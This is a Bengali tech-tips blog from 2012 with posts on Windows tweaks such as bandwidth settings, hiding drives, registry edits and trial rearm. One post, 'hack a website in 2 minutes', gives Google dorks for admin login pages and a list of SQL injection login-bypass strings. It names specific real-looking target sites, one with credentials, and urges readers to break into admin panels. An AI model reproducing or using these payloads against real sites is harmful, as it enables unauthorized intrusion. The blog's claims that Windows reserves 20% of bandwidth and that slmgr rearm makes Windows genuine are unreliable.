শুক্রবার, ৫ অক্টোবর, ২০১২

আপনার ইন্টার নেট এর স্পিড এবার ২০% বাড়িয়ে নিন


আজকে আপনাদের কে জানাব  ছোট্ট একটি টিপস এর মাধ্যমে কি ভাবে আপনার নেট এর স্পিড কিছুটা বাড়িয়ে নিতে পারেন, আমরা সাধারণত যে সব ইউন্ডোজ ব্যবহার করে থাকি  সব ধরনের ইউন্ডোজ তার নিজস্ব অবস্তা পর্যবেক্ষণ এবং তার নিজের কাজের জন্য আমাদের  নেট স্পিডে ভাগ বসায় ১০০% তে ২০% সে রিজার্ভ করে রাখে, এখন আমরা যদি চাই তাহলে
তাকে সেই ভাগ থেকে বঞ্চিত করতে পারি অথ্যাৎ, ইউন্ডোজ কে তার নিজের কাজের জন্য আমাদের নেট স্পিড যে ২০% মজুদ রাখে আমরা চাইলে সেটা ইউন্ডোজ এর কাজে না লাগিয়ে
আমরা আমাদের  কাজে লাগাতে পারি, আর অনেকেই প্রশ্ন রাখতে পারেন ইউন্ডোজ কেন আমদের নেট স্পিডে ভাগ বসায়, প্রথমত ইউন্ডোজ কে আপডেট দেওয়ার জন্য এবং সিকিউরিটি ওয়ার্নিং বা ইউন্ডোজ এর অন্যান্য কাজের জন্য…।

তাহলে এবার দেখুন কি ভাবে সে কাজটি করবেন

প্রথমে আপনি আপনার সিস্টেম রান কমান্ড এ যান এবং টাইপ করুন
gpedit.msc” এবং ইন্টার প্রেস করুন
এবার  এই লাইন গুল দেখুন এবং একটার পর একটা সিলেক্ট করতে থাকুন
–> Local Computer Policy
–> Computer Configuration
–> Administrative Templates
–> Network
–> QOS Packet Scheduler
–> Limit Reservable Bandwidth. এ ডাবল ক্লিক করুন
এবং সিলেক্ট Enabled
এবার নিচের ঘরে যেখানে ২০% লিখা আছে সেখানে  ০ দিয়ে এপ্লাই + ওকে করে ব্রাউজার
রিস্টার্ট করে নিন বা পিসিকে ও একবার রিস্টার্ট করে নিয়ে দেখুন আপনার সিস্টেম গতি কেমন

মঙ্গলবার, ১১ সেপ্টেম্বর, ২০১২

হার্ডডিস্কের যেকোনো ড্রাইভ লুকিয়ে রাখুন


আমাদের কম্পিউটারে অনেক সময় অনেক ব্যক্তিগত  তথ্য থাকতেই পারে, যেগুলো আমরা অন্যদের দেখাতে চাই না।
সে ক্ষেত্রে আপনি চাইলে হার্ডডিস্কের যেকোনো ড্রাইভ সব বাক্তিগত তথ্য রেখে ড্রাইভটি লুকিয়ে রাখতে পারেন।
এজন্য যা  করবেন , দেখে নিন ……
প্রথমে স্টার্ট মেনু থেকে Run-এ যেতে হবে বা কীবোর্ড থেকে Windows+R প্রেস করতে হবে ।
এর পর সেখানে cmd লিখে এন্টার করুন।কমান্ড প্রম্পট চালু হবে।
কমান্ড প্রম্পট চালু হলে  diskpart লিখে এন্টার করুন।
উইন্ডোজ সেভেনের ক্ষেত্রে একটি নোটিফিকেশন আসবে। সেটাতে ইয়েস করে দিলেই নতুন একটি কমান্ড প্রম্পট (নতুন উইন্ডো) চালু হবে।
সেখানে DISKPART> এর পরে লিখুন list volume এবং এন্টার করুন।সব কটি ড্রাইভের একটি তালিকা চলে আসবে।
এখন যে ড্রাইভটি আপনি লুকাতে বা হাইড করতে  চান, সেটির ভলিউম নম্বর লিখুন।
একটু খেয়েল করলে দেখতে পাবেন, প্রতিটি ড্রাইভের পাশেই এর ভলিউম নম্বর দেয়া আছে।
যেমন—আপনি যদি E:\ ড্রাইভ হাইড করতে চান, তাহলে E:\ ড্রাইভের ভলিউম নম্বর লিখে এন্টার করুন।
E:\ ড্রাইভের ভলিউম নম্বর 4 হলে লিখুন DISKPART>-এর পরে লিখুন select volume 4, তাহলে আপনার E:\ ভলিউমটি নির্বাচন করা হবে।
তারপর হাইড করার জন্য DISKPART>-এর পরে লিখুন remove letter E, তাহলে আপনার নির্বাচিত  ড্রাইভটি হাইড হবে।
এবারে মাই কম্পিউটারে গেলে ড্রাইভটি আবার দেখতে পাবেন না ।
যদি ড্রাইভটি আবার দেখতে চান, তাহলে হাইড  ড্রাইভটি একই পদ্ধতিতে নির্বাচন করে লিখুন assign letter E এবং Command Prompt বন্ধ করে দিন।
এবারে মাই কম্পিউটারে গেলে ড্রাইভটি আবার দেখতে পাবেন।
সবাই ভালো থাকুন । সুস্থ থাকুন । আমার জন্যও দোয়া করুন ।

সোমবার, ২৭ আগস্ট, ২০১২

আপনি কি লক করা ড্রাইভ খুলতে পারেন?


 যে ড্রাইভটি আপনি খুলতে পারছেন না, সে ড্রাইভের Proparties অপশনে যেতে হবে। সেখান থেকে Security ট্যাবে গিয়ে Advance অপশনে যান।
·    Advance-এ যাবার পর একটি উইন্ডো আসবে। সেখান থেকে Owner ট্যাবে যান। সেখান থেকে নির্দিষ্ট করে দেয়া Administrator-এ ক্লিক করুন।
·    এবার Replace Owners on Subcontainers of objects-এ ক্লিক করুন।
·    তারপর Apply অপশনে ক্লিক করে বেরিয়ে আসুন। এরপর যে উইন্ডো আসবে এবং তারপর যে উইন্ডো আসবে সবখানে Apply দিয়ে বের হয়ে আসুন। এবার দেখুন লক খুলে গেছে।

মঙ্গলবার, ৩ জুলাই, ২০১২

শিখে নিন পিসি দ্রুত করার একটি নতুন কৌশল!!


সবাইকে সালাম জানিয়ে শুরু করছি আমার আজকের ব্লগ।এটি আপনাদের সবার ই আনেক কাজে  আসবে।
পিসি দ্রুত করার জন্য আমাদের চেষ্টার অন্ত থাকে না নিজের প্রিয় পিসি টাকে দ্রুত রাখতে কে না চায়?এর জন্য আমরা ব্যাবহার করি নিত্ত নতুন কৌশল আজ আমি আপনাদের তেমন ই একটি কৌশল শেখাব যা আপনার পিসি দ্রুত করতে আপনাদের সাহায্য করবে।চলুন তবে কথা না বারিয়ে কাজ শুরু করি।
>.আপনার START মেন্যু থেকে RUN এ ক্লিক করুন এবং টাইপ করুন “regedit”
>.সিলেক্ট করুন “HKEY_CURRENT_USER”, এইখান থেকে control panel folder টি সিলেক্ট করুন এবং তারপর desktop folder সিলেক্ট করুন।
>.এইবার এইখানে ডান দিকে আপনি ”registry setting” একটি ট্যাব দেখতে পাবেন এইটি সিলেক্ট করার পর ”menu show delay” ট্যাব টিতে রাইট ক্লিক করুন এবং ”modify”. অপশন টি সিলেক্ট করুন।
>.এইখানে আপনি পাবেন ”edit string option” যার data value থাকবে 400 এটাকে পরিবর্তন করে 000. দিন।
>.সবকিছু ঠিক ঠাক মত শেষ করে আপনার পিসি টি রিস্টার্ট করুন।তারপর ই আপনি আপনার পিসি তে অন্নরকম পরিবর্তন লক্ষ করবেন!!
তবে আজকে এখানেই শেষ করছি আবার আমি ফাইয়াজ হাজির হব আমার নতুন কোন ব্লগ নিয়ে তার আগে ভাল থাকবেন সুস্থ থাকবেন এবং অবশ্যই পাশের মানুষটিকে ভাল রাখবেন।

সোমবার, ১৮ জুন, ২০১২

২ মিনিটে হ্যাক করুন ওয়েবসাইট

২ মিনিটে হ্যাক করুন ওয়েবসাইট। না দেখলে মিস করবেন *নতুনদের জন্য* 
আসুন শিখে ফেলি কিভাবে 2 মিনিটে একটা ওয়েবসাইট হ্যাক করতে হয়।

প্রথমে মামার কাছে যান… www.google.com এ।
এবার Search করুন নিচের থেকে যে কোন একটা Google dork লিখে।
আপনাদের জন্য আমি কিছু SQL injection Dork দিলাম 

“inurl:admin.asp” 

“inurl:adminlogin.php”
“inurl:adminhome.php”
“inurl:admin_login.php”

“inurl:admin/login.asp”

“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
“inurl:admin.php”
“inurl:login/admin.php”
“inurl:admin/login.php”
“inurl:administratorlogin.php”
“inurl:login/administrator.php”
“inurl:administrator_login.php”

এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
যদি ইন্দিয়ার সাইট খুজতে চান তাহলে dork এর আগে লিখুন ইন্ডিয়া। যেমন india”inurl:adminlogin.asp”
যে কোন একটি সাইটে প্রবেশ করুন।
এখানে username দিনঃ Admin
তারপর নিচের থেকে যেকোনো একটা পাসওয়ার্ড দিন।

'or'1'='1 admin admin123 admin1234 ' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1-- 

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 -- 

'or'1=1' 

তাহলে আপনার লগইন form হবে নিচের মত

username:Admin 

password:'or'1'='1

মনে রাখবেন যে বেশির ভাগ সাইট এর পাসওয়ার্ড হয় ‘or’1=1′ এবং admin

আর যে সাইট গুলো valuable ওই সাইট গুলো হ্যাক করতে পারবেন। 

আপনাদের জন্য কিছু সাইট দিলাম । এবার আপনারা অ্যাডমিন প্যানেল এ যান এবং যা ইচ্ছা করতে পারেন। 
1.http://www.amskrupajal.org/adminlogin.asp
user: admin
pass: ‘or”=’
2.www.lhhb.com/admin/login.asp
3.www.udesa.co.za/admin/login.asp
4.http://www.krupajalgroup.org/AdminLogin.asp
এখন ইচ্ছা মত সাইট হ্যাক করুন। ভাল থাকবেন সবাই।

শুক্রবার, ১৫ জুন, ২০১২

Turn off computer এবং Log Off মেনু হাইড করুন।


আসসালামু আলাইকুম।আশা করি ভাল আছেন সবাই।
আপনি ইচ্ছা করলে আপনার কপম্পিউটার এর Turn off computer এবং Log Off মেনু লুকিয়ে রাখতে পারেন। কিভাবে করবেন? Turn off computer এবং Log Off মেনু হাইড করতে নিচের পদ্ধতি অনুসরণ করুন।
১। Log Off মেনু হাইড করতে…
প্রথমে start- run এ যান। লিখুন gpedit.msc
Group Policy নামে নতুন একটি ঊইন্ডো open হবে।
এখন User Configuration →Administrative Templates → Start menu and taskbar এ যান।
এখন ডান পাশ থেকে Remove Log off on the StartMenu এ ডাবল ক্লিক করুন।
Remove Log off on the StartMenu ঊইন্ডো open হবে।
এখান থেকে Enabled এ সিলেক্ট করুন ।
এরপর apply করে ok দিয়ে বের হয়ে আসি।
দেখুন Log Off মেনু উধাও হয়ে গেছে।
Turn off computer এবং Log Off ফিরিয়ে আনতে উপরের নিয়মাবলি অনুসরণ করে শুধুমাত্র Enabled এর জায়গায়Disabled অথবা Not Configured এ সিলেক্ট করতে হবে । 

windows 7 জেনুইন করুন মাত্র ৩০ সেকেন্ডে!!!


সালাম নিবেন, আশাকরি ভালো আছেন। আজকে দেখাবো কিভাবে আপনি একদম ২ টা শব্দের একটি কোডিং দিয়ে আপনার উইন্ডোজ ৭ কে কোন প্রকার কিজেন, সিরিয়াল কি, ক্র্যাক করা ছারাই জেনুইন করতে পারবেন। একদম আনাড়ি টাইপ এর হলেও আপনি পারবেন এটি করতে।
১) প্রথমে স্টার্ট মেনুতে গিয়ে লিখুন cmd তারপরে cmd দেখা গেলে রাইট ক্লিক করে run as administrator এ ক্লিক করে ওপেন করুন
২) CMD ওপেন হলে এখন আপনার কাজ হয়েছে একটি কমান্ড লিখা. slmgr-rearm লিখে এন্টার চাপুন
তারপরে পিসি রিস্টার্ট মারেন .  তাহলে আপনার windows ৭ পিসি ৩০ দিনের জন্য জেনুইন বা একটিভ হয়ে যাবে . একই ভাবে আপনি পর পর ৪ বার এই কমান্ড বেবহার করে মোট ১২০ দিনের জন্য একটিভ করে নিতে পারবেন আপনার পিসিকে এবং কোনো প্রকার ঝামেলা ছাড়াই পিসি চালান শান্তিতে